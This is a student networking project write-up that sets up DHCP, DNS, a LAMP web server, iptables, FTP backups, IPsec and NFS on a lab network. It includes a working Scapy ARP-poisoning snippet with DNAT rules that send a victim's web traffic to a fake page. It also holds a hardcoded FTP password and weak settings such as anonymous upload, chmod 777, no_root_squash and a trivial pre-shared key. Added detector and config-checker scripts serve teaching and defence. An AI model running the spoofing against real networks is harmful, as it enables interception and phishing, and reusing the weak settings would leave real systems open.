Data Networking/Fall 2016/FYY

1. Fulin Shen 2. Yanxiao Lu 3. Yehui Rong

Motivation
The development of Linux is one of the most prominent examples of free and open-source software collaboration. This is our motivation for using the Linux operating system to design a robust, effective and dynamic network solution for a start-up company, including the main and backup DNS servers, a DHCP server, a web server, a firewall, an IPsec VPN, NFS and backup.

Domain Name System
The Domain Name System (DNS) manages the domain names of the web server and translates them to Internet Protocol (IP) addresses. DNS is a protocol within the set of standards for how devices exchange data on the Internet. In this project, we design five records for the web server, including A, AAAA, NS, CNAME, and PTR types.

Dynamic Host Configuration Protocol
Dynamic Host Configuration Protocol (DHCP) is a network protocol that enables a server to automatically assign an IP address to a computer from a defined range of numbers (i.e. a scope) configured for a given network. DHCP assigns an IP address when a system is started.

Web Server
LAMP (Linux, Apache, MySQL, and PHP) is the most popular solution to get a web server up and running. In this project, we use LAMP to set up a simple webpage so that clients can browse it with the DNS and DHCP server’s help.

Firewall
The main function of a firewall is to provide security through a set of rules applied to the server. Here we use the firewall to allow all the needed services and deny everything else, to make our network secure and robust.

File Transfer Protocol
The File Transfer Protocol (FTP) provides the backup for the server, to avoid the whole network crashing if the main server malfunctions. FTP runs on both the client and the server, and uses separate control and data connections between them. In the project, we design the policy to back up the whole web and SQL data every day, and clean the data every 30 days to save space.

Arp Poison
ARP (Address Resolution Protocol) determines the MAC address of a device from its IP address. ARP poisoning is a network attack that exploits the transition from layer 3 to layer 2 addresses: the hacker replaces the MAC address in a normal ARP message with a counterfeit one, and can then take the role of man in the middle to spoof any traffic. In the project, we use one client as the hacker to attack another client. Every time the normal client tries to log in to the web server page, the hacker replaces the web page and displays a fake website to the client.

IPsec VPN
IPsec (Internet Protocol Security) is a protocol used to offer secure IP communications by authenticating and encrypting the messages between the peers. Here we design an IPsec VPN tunnel between two servers using a pre-shared key.

Network File System
Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems, allowing the user or system administrator to mount (designate as accessible) all or a portion of a file system on a server. In this project, we create 2 clients to whom the shared file is available.

DHCP server
Step 1: Install DHCP
Command:
    sudo apt-get update
    sudo apt-get install dhcp3-server

Step 2: Configure the network card
Command:
    sudo nano /etc/default/isc-dhcp-server
Find the INTERFACES line below the ‘#’ comment lines and set the network card to ens33:
    # On what interfaces should the DHCP server (dhcpd) serve DHCP requests?
    #      Separate multiple interfaces with spaces, e.g. "eth0 eth1".
    INTERFACES="ens33"
Save and exit.

Step 3: Edit the dhcpd.conf file
Command:
    sudo nano /etc/dhcp/dhcpd.conf
Set the domain name and the domain-name servers:
    # option definitions common to all supported networks...
    option domain-name "pawupa.com";
    option domain-name-servers ns.pawupa.com;
Uncomment the following line:
    authoritative;
Give the IP address pool and define the subnet:
    # A slightly different configuration for an internal subnet.
    subnet 193.168.1.0 netmask 255.255.255.0 {
        range 193.168.1.20 193.168.1.100;
        option domain-name "pawupa.com";
        # master (193.168.1.102) and standby (193.168.1.103) DNS servers
        option domain-name-servers 193.168.1.102, 193.168.1.103;
        option routers 193.168.1.1;
        option broadcast-address 193.168.1.255;
        default-lease-time 600;
        max-lease-time 7200;
    }
Give fixed addresses to the web server, DNS server, DNS standby server and three clients:
    host web {
        hardware ethernet 00:0c:29:65:f0:5e;
        fixed-address 193.168.1.1;
    }
    host dns {
        hardware ethernet 00:0c:29:43:e7:1a;
        fixed-address 193.168.1.102;
        option routers 193.168.1.1;
        option broadcast-address 193.168.1.255;
        default-lease-time 600;
        max-lease-time 7200;
    }
    host dnsstandby {
        hardware ethernet 00:0c:29:c5:44:bd;
        fixed-address 193.168.1.103;
        option routers 193.168.1.1;
        option broadcast-address 193.168.1.255;
        default-lease-time 600;
        max-lease-time 7200;
    }

I give the three clients 193.168.1.104, 193.168.1.105 and 193.168.1.106 in the same way as above.

Step 4: Give a static address to the DHCP server
Command:
    sudo nano /etc/network/interfaces
Configuration of interfaces:
    # interfaces(5) file used by ifup(8) and ifdown(8)
    auto lo
    iface lo inet loopback

    auto ens33
    iface ens33 inet static
        address 193.168.1.200
        netmask 255.255.255.0
        network 193.168.1.0
        broadcast 193.168.1.255
        gateway 193.168.1.1

    iface ens33 inet6 static
        address 1199::1
        netmask 64

DHCP IPv6 configuration

Step 5: Open the IPv6 configuration
Command:
    sudo nano /etc/sysctl.conf

Make the changes as shown below:
    net.ipv6.conf.all.forwarding=1

Run sysctl -p to make it effective.

Step 6: Install radvd
Command:
    sudo apt-get install radvd

Step 7: Configure the IPv6 address pool
Command:
    sudo nano /etc/radvd.conf
Contents:
    interface ens33 {
        AdvSendAdvert on;
        prefix 1199::/64 {
        };
    };

Step 8: Give the DHCP server a fixed address
Just as shown in Step 4.

Step 9: Configure the DHCP server to access the website through the domain name
Command:
    sudo nano /etc/resolv.conf
Contents:
    nameserver 193.168.1.102
    nameserver 193.168.1.103

Step 10: Restart and check the DHCP server after configuration
Command:
    sudo /etc/init.d/networking restart
    sudo /etc/init.d/isc-dhcp-server restart
    sudo service isc-dhcp-server status

DNS
Master DNS

Step 1: Install bind9
Command:
    sudo apt-get install bind9
After installing bind9, we get the configuration files named.conf, named.conf.options, and named.conf.local in

Step 2: Requirements
We want to make this host the master DNS, able to resolve www.pawupa.com to 193.168.1.1 (the web server), and to add five records.
Thus, we need to add:
    Forward lookup zone “pawupa.com”
    Backward lookup zone “1.168.193.in-addr.arpa”
    Another backward lookup zone for IPv6, “0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa”

Step 3: Edit the configuration file “named.conf.local”
Add the forward and backward lookup zones.
Command:
    sudo vi named.conf.local
Contents:
    zone "pawupa.com" {
        type master;
        file "/etc/bind/pawupa.com";
    };
    zone "1.168.193.in-addr.arpa" {
        type master;
        file "/etc/bind/rev.pawupa.com";
    };
    zone "0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa" {
        type master;
        file "/etc/bind/revip6.pawupa.com";
    };

Step 4: Add the zone files
Copy the zone file “db.local” to pawupa.com, to rev.pawupa.com and to revip6.pawupa.com.
Command:
    sudo cp /etc/bind/db.local /etc/bind/pawupa.com
    sudo cp /etc/bind/db.local /etc/bind/rev.pawupa.com
    sudo cp /etc/bind/db.local /etc/bind/revip6.pawupa.com

Step 5: Edit the zone files
Command:
    sudo vi pawupa.com
Contents:
    ;
    ; BIND data file for local loopback interface
    ;
    $TTL    604800
    @       IN      SOA     pawupa.com. root.pawupa.com. (
                                  6         ; Serial
                             604800         ; Refresh
                              86400         ; Retry
                            2419200         ; Expire
                             604800 )       ; Negative Cache TTL
    ;
    @       IN      NS      ns.pawupa.com.
    @       IN      A       193.168.1.102
    @       IN      AAAA    1199::1111
    ns      IN      A       193.168.1.102
    ns      IN      AAAA    1199::1111
    www     IN      A       193.168.1.1
    www     IN      AAAA    1199::2222
    oh      IN      CNAME   www
    diao    IN      CNAME   www
    wu      IN      CNAME   www
    pan     IN      CNAME   www

Command:
    sudo vi rev.pawupa.com
Contents:
    ;
    ; BIND reverse data file for local loopback interface
    ;
    $TTL    604800
    @       IN      SOA     pawupa.com. root.pawupa.com. (
                                  6         ; Serial
                             604800         ; Refresh
                              86400         ; Retry
                            2419200         ; Expire
                             604800 )       ; Negative Cache TTL
    ;
    @       IN      NS      ns.pawupa.com.
    102     IN      PTR     ns.pawupa.com.
    1       IN      PTR     www.pawupa.com.
    1       IN      PTR     diao.pawupa.com.
    1       IN      PTR     oh.pawupa.com.
    1       IN      PTR     wu.pawupa.com.
    1       IN      PTR     pan.pawupa.com.

Command:
    sudo vi revip6.pawupa.com
Contents:
    ;
    ; BIND reverse data file for local loopback interface
    ;
    $TTL    604800
    @       IN      SOA     pawupa.com. root.pawupa.com. (
                                  6         ; Serial
                             604800         ; Refresh
                              86400         ; Retry
                            2419200         ; Expire
                             604800 )       ; Negative Cache TTL
    ;
    @       IN      NS      ns.pawupa.com.
    1.1.1.1.0.0.0.0.0.0.0.0.0.0.0.0 IN     PTR     ns.pawupa.com.
    2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN     PTR     www.pawupa.com.
    2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN     PTR     diao.pawupa.com.
    2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN     PTR     oh.pawupa.com.
    2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN     PTR     wu.pawupa.com.
    2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN     PTR     pan.pawupa.com.

Step 6: Restart the DNS service
Command:
    sudo /etc/init.d/bind9 restart

Slave DNS

Step 1: Edit the configuration file “named.conf.local” (on the master DNS host)
Add “allow-transfer { 193.168.1.103; };” to each zone, so that the zone configuration is synchronized from the master to the slave. If the master DNS cannot be used, the slave DNS will resolve names in its place. (193.168.1.103 is the IP address of the slave DNS.)

Command:
    sudo vi /etc/bind/named.conf.local
Contents:
    zone "pawupa.com" {
        type master;
        file "/etc/bind/pawupa.com";
        allow-transfer { 193.168.1.103; };
    };
    zone "1.168.193.in-addr.arpa" {
        type master;
        file "/etc/bind/rev.pawupa.com";
        allow-transfer { 193.168.1.103; };
    };
    zone "0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa" {
        type master;
        file "/etc/bind/revip6.pawupa.com";
        allow-transfer { 1199::5555; };
    };

Step 2: Install bind9 on another host (the slave DNS)
Command:
    sudo apt-get install bind9

Step 3: Edit the configuration file “named.conf.local” on the slave DNS host
Add the forward and backward lookup zones.
Command:
    sudo vi /etc/bind/named.conf.local
Contents:
    zone "pawupa.com" {
        type slave;
        file "/etc/bind/slaves/pawupa.com";
        masters { 193.168.1.102; };
    };
    zone "1.168.193.in-addr.arpa" {
        type slave;
        file "/etc/bind/slaves/rev.pawupa.com";
        masters { 193.168.1.102; };
    };
    zone "0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa" {
        type slave;
        file "/etc/bind/slaves/revip6.pawupa.com";
        masters { 1199::1111; };
    };

Step 4: Change the permissions on “/etc/bind”
Command:
    sudo vi /etc/apparmor.d/usr.sbin.named
Change "/etc/bind/** r," to "/etc/bind/** rw,"

Step 5: Restart AppArmor
Command:
    sudo /etc/init.d/apparmor restart

Step 6: Restart the DNS service
The zone files will be synchronized from the master DNS.
Command:
    sudo /etc/init.d/bind9 restart

Web Server
Step 1: Install Apache
Command:
    sudo apt-get update
    sudo apt-get install apache2

Step 2: Install PHP
Command:
    sudo apt-get install php

Step 3: Install MySQL, password “linux”
Command:
    sudo apt-get install mysql-server

Step 4: Check that MySQL is working
Command:
    sudo netstat -tap | grep mysql

Step 5: Install phpmyadmin, using apache2 and mysql-server with the password linux
Command:
    sudo apt-get install phpmyadmin

Step 6: Change the permissions of /var/www
Command:
    sudo chmod 777 /var/www

Step 7: Create the phpmyadmin link
Command:
    sudo ln -s /usr/share/phpmyadmin /var/www/html

Step 8: Create a basic webpage “Index.htm”

Step 9: Change the default webpage directory “/var/www” to “/home/fulin”
Command:
    sudo vi /etc/apache2/apache2.conf

Step 10: Change the default webpage directory “/var/www/html” to “/home/fulin”
Command:
    sudo vi /etc/apache2/sites-available/000-default.conf

Step 11: Restart Apache
Command:
    sudo /etc/init.d/apache2 restart

Step 12: Use the browser on the Mac to connect to the web page of the web server in the VM

Firewall
Step 1: List the current rules that are configured for iptables
Command:
    sudo iptables -L

Step 2: Accept your current SSH connection
Command:
    sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

Step 3: Accept SSH, HTTP, FTP, TFTP, DHCP, DNS, VPN
Command:
    sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT
    sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
    sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT
    sudo iptables -A INPUT -p tcp --dport 20 -j ACCEPT
    sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT
    sudo iptables -A OUTPUT -p tcp --dport 20 -j ACCEPT
    sudo iptables -A OUTPUT -p tcp --dport 21 -j ACCEPT
    # DNS: zone transfers and large answers use TCP, ordinary queries use UDP
    sudo iptables -A INPUT -p tcp --dport 53 -j ACCEPT
    sudo iptables -A INPUT -p udp --dport 53 -j ACCEPT
    # DHCPv6 client (546) and server (547) ports are UDP
    sudo iptables -A INPUT -p udp --dport 546 -j ACCEPT
    sudo iptables -A INPUT -p udp --dport 547 -j ACCEPT
    sudo iptables -A INPUT -p tcp --dport 1723 -j ACCEPT
    sudo iptables -A INPUT -p udp --dport 500 -j ACCEPT
    sudo iptables -A INPUT -p udp --dport 4500 -j ACCEPT
    sudo iptables -A INPUT -p udp --dport 69 -j ACCEPT
    sudo iptables -A OUTPUT -p udp --dport 69 -j ACCEPT
    sudo iptables -A INPUT -p udp --dport 1701 -j ACCEPT
    sudo iptables -A INPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT
    sudo iptables -A OUTPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT

Step 4: Allow services on the computer to communicate with each other by sending network packets to each other
Command:
    sudo iptables -I INPUT 1 -i lo -j ACCEPT

Step 5: Accept all traffic on the loopback interface
Command:
    sudo iptables -A INPUT -i lo -j ACCEPT
    sudo iptables -A OUTPUT -o lo -j ACCEPT

Step 6: Allow established outgoing connections
Command:
    sudo iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT

Step 7: Internal to external
Command:
    sudo iptables -A FORWARD -i ens33 -o ens33 -j ACCEPT

Step 8: Drop invalid packets
Command:
    sudo iptables -A INPUT -m conntrack --ctstate INVALID -j DROP

Step 9: Deny ping
Command:
    sudo iptables -A INPUT -p icmp --icmp-type echo-request -j REJECT

Step 10: Limit each client to 10 connections
Command:
    sudo iptables -A INPUT -p tcp --dport 22 -m connlimit --connlimit-above 10 -j REJECT

Step 11: Prevent HTTP flood
Command:
    sudo iptables -A INPUT -p tcp --dport 80 -m limit --limit 100/minute --limit-burst 200 -j ACCEPT

Step 12: Block an IP address
Command:
    sudo iptables -I INPUT -s 193.168.1.104 -j DROP

Step 13: Cancel the block on the IP address
Command:
    sudo iptables -D INPUT -s 193.168.1.104 -j DROP

Step 14: Permit VPN
Command:
    sudo iptables -A INPUT -p udp --dport 500 -j ACCEPT
    sudo iptables -A INPUT -p udp --dport 4500 -j ACCEPT
    sudo iptables -A INPUT -p esp -j ACCEPT

Step 15: Deny any other
Command:
    sudo iptables -A INPUT -j DROP

Step 16: In order to preserve your iptables rules upon reboot, install iptables-persistent
Command:
    sudo apt-get install iptables-persistent

Step 17: If you make any changes to the rules, run the following commands so you don’t lose them during a system reboot
Command:
    sudo netfilter-persistent save
    sudo netfilter-persistent reload
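
iptables walks a chain from the top and stops at the first terminating rule that matches, so the order in which the steps above append rules decides whether the limits in Steps 10 and 11 are ever evaluated. The following is an added example, not part of the original project: a simplified shadowing check over an abridged copy of the page's rules. The parser handles only flag/value pairs, and the REORDERED rule set is one possible fix, given here as an assumption.

```python
import shlex

# Abridged copy of the INPUT rules from Steps 2, 3, 9, 10, 11 and 15, in the
# order the steps append them.
PAGE_RULES = """
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -p icmp --icmp-type echo-request -j REJECT
iptables -A INPUT -p tcp --dport 22 -m connlimit --connlimit-above 10 -j REJECT
iptables -A INPUT -p tcp --dport 80 -m limit --limit 100/minute --limit-burst 200 -j ACCEPT
iptables -A INPUT -j DROP
"""

# Assumed fix: limits come before the plain ACCEPT for the same port, and the
# unconditional port-80 ACCEPT is gone, so packets over the rate limit fall
# through to the final DROP.
REORDERED = """
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p icmp --icmp-type echo-request -j REJECT
iptables -A INPUT -p tcp --dport 22 -m connlimit --connlimit-above 10 -j REJECT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -m limit --limit 100/minute --limit-burst 200 -j ACCEPT
iptables -A INPUT -j DROP
"""

TERMINAL = {"ACCEPT", "DROP", "REJECT"}


def parse_rule(line):
    """Split one 'iptables -A ...' line into selector, extra matches and target."""
    toks = shlex.split(line)[1:]                     # drop the "iptables" word
    rule = {"proto": None, "dport": None, "target": None, "conds": []}
    for flag, value in zip(toks[0::2], toks[1::2]):
        if flag == "-p":
            rule["proto"] = value
        elif flag == "--dport":
            rule["dport"] = value
        elif flag == "-j":
            rule["target"] = value
        elif flag not in ("-A", "-m"):
            rule["conds"].append((flag, value))      # state, limit, connlimit, ...
    return rule


def covers(earlier, later):
    """True if the earlier rule decides every packet the later rule could match."""
    return (earlier["target"] in TERMINAL
            and not earlier["conds"]                 # unconditional on its selector
            and earlier["proto"] in (None, later["proto"])
            and earlier["dport"] in (None, later["dport"]))


def shadowed(ruleset):
    """Return (rule_number, shadowing_rule_number) pairs, numbered from 1."""
    rules = [parse_rule(l) for l in ruleset.strip().splitlines()]
    findings = []
    for j, later in enumerate(rules):
        for i in range(j):
            if covers(rules[i], later):
                findings.append((j + 1, i + 1))
                break
    return findings


if __name__ == "__main__":
    for later, earlier in shadowed(PAGE_RULES):
        print(f"rule {later} is never reached: rule {earlier} already decides its packets")
    print("reordered rule set:", shadowed(REORDERED) or "no shadowed rules")
```

On the running host, `sudo iptables -L INPUT -v -n` shows per-rule packet counters; a limit rule whose counter stays at zero under traffic is shadowed in the same way.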

Backup
Step 1: Install FTP
Command:
    sudo apt-get install vsftpd

Step 2: Start the FTP server
Command:
    service vsftpd start

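Step 3: Create the FTP script “testftp.sh”
    #!/bin/sh
    FTP_IP=193.168.1.104
    FTP_USER=fulinshen
    FTP_PASS=sflin911911
    FTP_backup=/home/fulinshen/test   # remote directory on the FTP server
    BK_DR=/home/fulin/varcopy         # local backup directory
    DB_DR=/var                        # data to back up
    DAYS=30                           # days to keep local archives
    LINUX_USER=fulinshen
    date=$(date +%Y%m%d)
    # archive the data and hand the archive to the local user
    tar zcvf "$BK_DR/test$date.tar.gz" "$DB_DR"
    chown -R "$LINUX_USER:$LINUX_USER" "$BK_DR"
    # delete local archives older than $DAYS days; matching only *.tar.gz
    # keeps testftp.sh itself, which lives in the same directory
    find "$BK_DR" -name "test*.tar.gz" -type f -mtime +"$DAYS" -exec rm {} \;
    deldate=$(date -d -30day +%Y%m%d)
    # upload today's archive and delete the 30-day-old one on the server
    ftp -i -v -n "$FTP_IP" << END
    user $FTP_USER $FTP_PASS
    binary
    cd $FTP_backup
    lcd $BK_DR
    mput test$date.tar.gz
    mdelete test$deldate.tar.gz
    bye
    END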

Step 4: Make the script executable
Command:
    chmod +x /home/fulin/varcopy/testftp.sh

Step 5: Change the FTP configuration
Command:
    sudo vi /etc/vsftpd.conf
Contents:
    anonymous_enable=YES
    local_enable=YES
    anon_upload_enable=YES
    anon_mkdir_write_enable=YES

Step 6: Add the kernel module to allow passive FTP
Command:
    modprobe ip_conntrack_ftp

Step 7: Restart the FTP service and check the status
Command:
    service vsftpd restart
    service vsftpd status

Step 8: Add a rule to run the script every day at 14:40
Command:
    sudo vi /etc/crontab
Contents:
    40 14 * * * root sh /home/fulin/varcopy/testftp.sh >/dev/null 2>&1

Step 9: Restart the cron service and check the status
Command:
    service cron restart
    service cron status

Arp poison
Step 1: Install Scapy
Command:
    sudo apt-get install tcpdump python3-crypto ipython3
    sudo apt install python-scapy
    sudo apt install sysv-rc-conf

Step 2: Use root
Command:
    sudo passwd root

Step 3: Start iptables after reboot
Command:
    sysv-rc-conf --level 2345 iptables on

Step 4: Turn on IP forwarding
Command:
    echo 1 > /proc/sys/net/ipv4/ip_forward

Step 5: Configure the Scapy ARP poison
Command:
    scapy
    op=2
    victim='193.168.1.105'
    spoof='193.168.1.1'           # gateway IP
    mac='00:0c:29:73:56:67'       # victim MAC address
    arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac)
    send(arp)
    op=1
    arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac)
    send(arp)
    send(arp,inter=2,count=1000)  # send ARP every 2 seconds, 1000 counts

Step 6: Create the fake web page
Command:
    /etc/init.d/apache2 start
    echo "WOW,YOU WON THE POWER BALL JACKPOT." > /home/fulinshen/index.htm

Step 7: Then configure iptables to forward all traffic except HTTP traffic. For HTTP traffic, we will return our own site instead (193.168.1.104 is the IP address of the hacker)
Command:
    iptables -t nat --flush
    iptables --zero
    iptables -A FORWARD --in-interface ens33 -j ACCEPT
    iptables -t nat --append POSTROUTING --out-interface ens33 -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination 193.168.1.104
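
Seen from the defending side, the messages sent in Step 5 are ARP traffic that contradicts known IP-to-MAC bindings, and both the spoofed reply (op=2) and the spoofed request (op=1) can be caught that way. The following is an added example, not part of the original project: it checks captured ARP lines against the fixed-address host entries from the dhcpd.conf above. The capture lines are constructed in the style of `tcpdump -e -n arp` output, and 00:0c:29:aa:bb:cc is a made-up MAC standing in for the client at 193.168.1.104.

```python
import re

# Trusted IP -> MAC bindings, taken from the host entries in the dhcpd.conf
# shown in the DHCP server section of this page.
TRUSTED = {
    "193.168.1.1": "00:0c:29:65:f0:5e",    # host web (also the gateway)
    "193.168.1.102": "00:0c:29:43:e7:1a",  # host dns
    "193.168.1.103": "00:0c:29:c5:44:bd",  # host dnsstandby
}

# Constructed sample capture (not real traffic): a normal request/reply pair,
# then a spoofed reply and a spoofed request claiming the gateway address.
SAMPLE = """\
14:40:01.000000 00:0c:29:73:56:67 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 193.168.1.1 tell 193.168.1.105, length 28
14:40:01.000400 00:0c:29:65:f0:5e > 00:0c:29:73:56:67, ethertype ARP (0x0806), length 60: Reply 193.168.1.1 is-at 00:0c:29:65:f0:5e, length 46
14:40:07.100000 00:0c:29:aa:bb:cc > 00:0c:29:73:56:67, ethertype ARP (0x0806), length 42: Reply 193.168.1.1 is-at 00:0c:29:aa:bb:cc, length 28
14:40:09.100000 00:0c:29:aa:bb:cc > 00:0c:29:73:56:67, ethertype ARP (0x0806), length 42: Request who-has 193.168.1.105 tell 193.168.1.1, length 28
"""

LINE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[0-9a-f:]{17}) > (?P<dst>[0-9a-f:]{17}), ethertype ARP .*?: "
    r"(?:Reply (?P<rip>\S+) is-at (?P<rmac>[0-9a-f:]{17})"
    r"|Request who-has \S+ tell (?P<qip>[0-9.]+))"
)


def detect(capture, trusted=TRUSTED):
    """Return (timestamp, ip, reason) alerts for ARP messages that contradict a binding."""
    learned = dict(trusted)            # trusted entries are never overwritten
    alerts = []
    for line in capture.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip = m["rip"] or m["qip"]      # the address the sender claims to own
        mac = m["rmac"] or m["src"]    # a request names its sender MAC only in the frame header
        if m["rmac"] and m["rmac"] != m["src"]:
            alerts.append((m["ts"], ip, "ARP sender MAC differs from Ethernet source"))
        known = learned.setdefault(ip, mac)   # first sighting of an unknown IP is learned
        if known != mac:
            kind = "trusted binding contradicted" if ip in trusted else "binding changed"
            alerts.append((m["ts"], ip, f"{kind}: expected {known}, saw {mac}"))
    return alerts


if __name__ == "__main__":
    for ts, ip, reason in detect(SAMPLE):
        print(ts, ip, reason)
```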

IPsec VPN
Step 1: Install strongSwan
Command:
    sudo apt-get install strongswan

Step 2: Install OpenSC
Command:
    sudo apt-get install opensc

Step 3: Install the GMP library
Command:
    sudo apt-get install libgmp10

Step 4: Install the development library of GMP
Command:
    sudo apt-get install libgmp-dev

Step 5: Install OpenSSL libcrypto
Command:
    sudo apt-get install libssl-dev

Step 6: Under the /usr/src/ folder, download strongSwan
Command:
    cd /usr/src
    wget https://download.strongswan.org/strongswan-5.5.0.tar.gz

Step 7: Extract the compressed file
Command:
    tar -xzf strongswan-5.5.0.tar.gz

Step 8: Run the configure script to check the dependencies of strongSwan
Command:
    cd strongswan-5.5.0
    ./configure --help | grep pkcs

Step 9: Run the configure script, use the prefix /usr/local and enable OpenSSL support
Command:
    ./configure --prefix=/usr/local --enable-openssl

Step 10: Run the following two commands to compile and install strongSwan under the /usr/local directory
Command:
    make
    make install

Step 11: Under the /usr/local/etc path, configure the pre-shared-key based tunnel
One side, ipsec.conf configuration:
    config setup
        charondebug="all"
        uniqueids=yes
        strictcrlpolicy=no

    conn %default

    conn tunnel #
        left=193.168.1.1
        leftsubnet=192.168.223.0/24
        right=193.168.1.104
        rightsubnet=192.168.222.0/24
        ike=aes256-sha2_256-modp1024!
        esp=aes256-sha2_256!
        keyingtries=0
        ikelifetime=1h
        lifetime=8h
        dpddelay=30
        dpdtimeout=120
        dpdaction=restart
        authby=secret
        auto=start
        keyexchange=ikev2
        type=tunnel
ipsec.secrets file configuration:
    193.168.1.1 193.168.1.104 : PSK "linux"

The other side, ipsec.conf configuration:
    config setup
        charondebug="all"
        uniqueids=yes
        strictcrlpolicy=no

    conn %default

    conn tunnel #
        left=193.168.1.104
        leftsubnet=192.168.1.0/24
        right=193.168.1.1
        rightsubnet=192.168.2.0/24
        ike=aes256-sha2_256-modp1024!
        esp=aes256-sha2_256!
        keyingtries=0
        ikelifetime=1h
        lifetime=8h
        dpddelay=30
        dpdtimeout=120
        dpdaction=restart
        authby=secret
        auto=start
        keyexchange=ikev2
        type=tunnel
ipsec.secrets file configuration:
    193.168.1.104 193.168.1.1 : PSK "linux"

Step 12: After the changes on both sides, create the tunnel
Command:
    sudo ipsec restart

Step 13: Check the status of the tunnel on both machines
Command:
    sudo ipsec statusall

Step 14: Test
One server pings the other:
    ping -s 4048 193.168.1.104
On the other side, watch the status (if the number of packets and the number of bytes increase while the ping is running, things are running the way they should be):
    sudo watch ipsec statusall
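
In a site-to-site tunnel each end's left/leftsubnet must equal the other end's right/rightsubnet, and both ends must offer the same proposals. The following is an added example, not part of the original project and not a strongSwan tool: it compares abridged copies of the two conn sections from Step 11 and reports what does not line up, plus the 1024-bit Diffie-Hellman group in the ike proposal. check_pair() and its finding codes are hypothetical names, and the page does not say which pair of subnets is the intended one.

```python
# Abridged copies of the two "conn tunnel" sections from Step 11.
SIDE_A = """
conn tunnel
    left=193.168.1.1
    leftsubnet=192.168.223.0/24
    right=193.168.1.104
    rightsubnet=192.168.222.0/24
    ike=aes256-sha2_256-modp1024!
    esp=aes256-sha2_256!
    authby=secret
    keyexchange=ikev2
"""
SIDE_B = """
conn tunnel
    left=193.168.1.104
    leftsubnet=192.168.1.0/24
    right=193.168.1.1
    rightsubnet=192.168.2.0/24
    ike=aes256-sha2_256-modp1024!
    esp=aes256-sha2_256!
    authby=secret
    keyexchange=ikev2
"""

MIRRORED = [("left", "right"), ("leftsubnet", "rightsubnet")]
IDENTICAL = ["ike", "esp", "authby", "keyexchange"]


def parse_conn(text, name="tunnel"):
    """Return the key=value parameters of one conn section of an ipsec.conf."""
    params, active = {}, False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments
        if not line:
            continue
        words = line.split()
        if words[0] in ("conn", "config"):         # a new section starts
            active = words == ["conn", name]
        elif active and "=" in line:
            key, value = line.split("=", 1)
            params[key.strip()] = value.strip()
    return params


def check_pair(a, b):
    """Compare both ends of a tunnel; return a list of (code, detail) findings."""
    findings = []
    for mine, theirs in MIRRORED:
        for ka, kb in ((mine, theirs), (theirs, mine)):
            if a.get(ka) != b.get(kb):
                findings.append(("not-mirrored", f"A {ka}={a.get(ka)} but B {kb}={b.get(kb)}"))
    for key in IDENTICAL:
        if a.get(key) != b.get(key):
            findings.append(("differs", f"{key}: A={a.get(key)} B={b.get(key)}"))
    for side, conf in (("A", a), ("B", b)):
        if "modp1024" in conf.get("ike", ""):
            findings.append(("weak-dh", f"{side} ike={conf['ike']} uses the 1024-bit MODP group"))
    return findings


if __name__ == "__main__":
    for code, detail in check_pair(parse_conn(SIDE_A), parse_conn(SIDE_B)):
        print(f"{code}: {detail}")
```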

NFS
NFS-Server

Step 1: Install nfs-kernel-server
Command:
    sudo apt-get install nfs-kernel-server
    sudo apt-get install rpcbind

Step 2: Make the shared folder
Command:
    mkdir /home/reve001/Desktop/nfs

Step 3: Edit the configuration
Command:
    sudo vi /etc/exports
Contents:
    /home/reve001/Desktop/nfs *(rw,sync,no_root_squash,no_subtree_check)

Step 4: Restart the services
Command:
    sudo service rpcbind restart
    sudo service nfs-kernel-server restart

Step 5: Test
Command:
    showmount -e
Output:
    Export list for ubuntu:
    /home/reve001/Desktop/nfs *

NFS-Clients 

Step 1: Install nfs-common for the clients
Command:
    sudo apt-get install nfs-common
    sudo apt-get install rpcbind

Step 2: Make the shared folder
Command:
    mkdir /home/fulinshen/Desktop/nfs

Step 3: Mount the shared folder
Command:
    sudo mount -t nfs 193.168.1.102:/home/reve001/Desktop/nfs /home/fulinshen/Desktop/nfs

Step 4: Mount the shared folder when the client is turned on
Command:
    sudo vi /etc/rc.local
Contents:
    sudo mount -t nfs 193.168.1.102:/home/reve001/Desktop/nfs /home/fulinshen/Desktop/nfs

DHCP Test
Step 1: Start the DHCP server.
Step 2: Start all the other clients and use the “ifconfig” command to check whether or not the IP address is correctly received from the DHCP server.

Webserver Test
Step 1: Start the web server.
Step 2: At the client side, open the browser and enter the IP address of the web server to check whether or not the right web page is displayed.

DNS Test
Step 1: Start the DNS server.
Step 2: At the client side, open the browser again and this time enter the domain name of the web server instead of the IP address, then check whether or not the right web page is displayed.

Firewall Test
Step 1: At a client side, open the browser to surf the web page.
Step 2: Add an iptables rule to deny the client browsing the web server.
Step 3: At the client side, open the browser again, force refresh the web page, and check whether or not the right web page is displayed.
